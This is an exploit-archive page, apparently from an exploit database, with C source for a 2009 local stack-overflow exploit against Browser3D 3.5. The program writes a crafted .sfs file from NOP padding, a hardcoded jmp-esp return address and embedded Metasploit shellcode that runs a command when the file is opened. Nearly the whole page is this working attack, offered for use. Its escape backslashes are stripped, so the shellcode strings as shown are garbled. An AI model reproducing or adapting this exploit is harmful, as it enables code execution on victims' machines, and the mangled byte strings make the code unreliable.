Browser3D 3.5 (.sfs File) Local Stack Overflow Exploit (c)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Browser3D 3.5 (.sfs File) Local Stack Overflow Exploit (c)
# Published : 2009-01-22
# Author : SimO-s0fT
# Previous Title : MySQL 4/5/6 UDF for Command Execution
# Next Title : Browser3D 3.5 (.sfs File) Local Stack Overflow Exploit

#include<stdio.h>
#include<string.h>
#include<windows.h>

/* Browser3D local BOF exploit
* coded by SimO-s0fT ( maroc-anti-connexion@hotmail.com)
*greetz to: all friends & all morroccan hackers
*special tnx for str0ke
/* win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xc2"
"xf8x23x02x83xebxfcxe2xf4x3ex10x67x02xc2xf8xa8x47"
"xfex73x5fx07xbaxf9xccx89x8dxe0xa8x5dxe2xf9xc8x4b"
"x49xccxa8x03x2cxc9xe3x9bx6ex7cxe3x76xc5x39xe9x0f"
"xc3x3axc8xf6xf9xacx07x06xb7x1dxa8x5dxe6xf9xc8x64"
"x49xf4x68x89x9dxe4x22xe9x49xe4xa8x03x29x71x7fx26"
"xc6x3bx12xc2xa6x73x63x32x47x38x5bx0ex49xb8x2fx89"
"xb2xe4x8ex89xaaxf0xc8x0bx49x78x93x02xc2xf8xa8x6a"
"xfexa7x12xf4xa2xaexaaxfax41x38x58x52xaax08xa9x06"
"x9dx90xbbxfcx48xf6x74xfdx25x9bx42x6exa1xf8x23x02";
int main(int argc,char *argv[]){
    printf("t ===>viva marrakesh city<===tn");
    FILE *openfile;
    char exploit[430];
    char junk[262];
    char ret[]="x68xD5x857C";//jmp kernel32.dll esp (windows trust sp2)
    char nop[]="x90x90x90x90";
    memset(junk,0x90,262);
    memcpy(exploit,junk,strlen(junk));
    memcpy(exploit+strlen(junk),ret,strlen(ret));
    memcpy(exploit+strlen(junk)+strlen(ret),nop,strlen(nop));
    memcpy(exploit+strlen(junk)+strlen(ret)+strlen(nop),scode,160);
    openfile=fopen("simo.sfs","wb");
    if(openfile==NULL){ perror("can't opening this filen"); }
    fwrite(exploit,1,sizeof(exploit),openfile);
    fclose(openfile);
    printf("file created ....!"
                 "open it whit Browser3d");
    return 0;
}

// www.Syue.com [2009-01-22]